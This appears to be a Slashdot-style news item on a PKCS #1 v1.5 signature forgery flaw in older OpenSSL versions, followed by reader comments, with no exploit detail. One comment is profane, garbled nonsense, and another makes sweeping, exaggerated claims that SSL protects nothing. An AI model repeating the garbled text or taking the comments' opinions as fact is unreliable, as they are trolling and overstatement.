OpenSSL Hit by Forgery Bug

Daniel Cray writes to tell us ZDNet is reporting that OpenSSL versions up to 0.9.7j and 0.9.8b are vulnerable to a signature forgery technique. OpenSSL has already released an update fixing the problem. From the article: "The flaw only affects a particular type of signature — PKCS #1 v1.5 signatures — but these are used by some certificate authorities... The signature forgery technique was first demonstrated last month at the Crypto 2006 conference by Daniel Bleichenbacher, a cryptographer with Bell Labs, according to security firm Netcraft. OpenSSL credited Google Security with successfully forging various certificates and providing the fix."

fuck a c0m

and the strikixng is the worst off vary for different Keep unnecessary fanatic known

Re:Google saves the day...

[AmberBlackCat]

Mindlessly attacking Windows doesn't make this flaw go away in the open source software, just as saying something bad about China doesn't make the United States the land of the free or the home of the brave. Replying to this message with some inaccurate claim about Windows having a thousand new bugs every day won't make it go away either.

SSL is overrated

[YGingras]

You can't apply a technological solution to a social problem. Resellers will sell certs to anyone and no one even bother to have their certs signed anymore. Even my uni don't have a signed cert. You see messages like "if you browsers say that the certificate authority isn't knowned just click accept" and people just do that. Do anyone even understand what that message mean? I mean anyone not in CS and even then I'm not sure that most people grasp how the trust is supposed to go from Verisign down to your browser. Frankly I don't see what SSL _can_ protect. Unless anyone can understand how it works, the passing of certificates is doomed to be useles.

Netcraft confirms it...

[Brando_Calrisean]

... OpenSSH is dead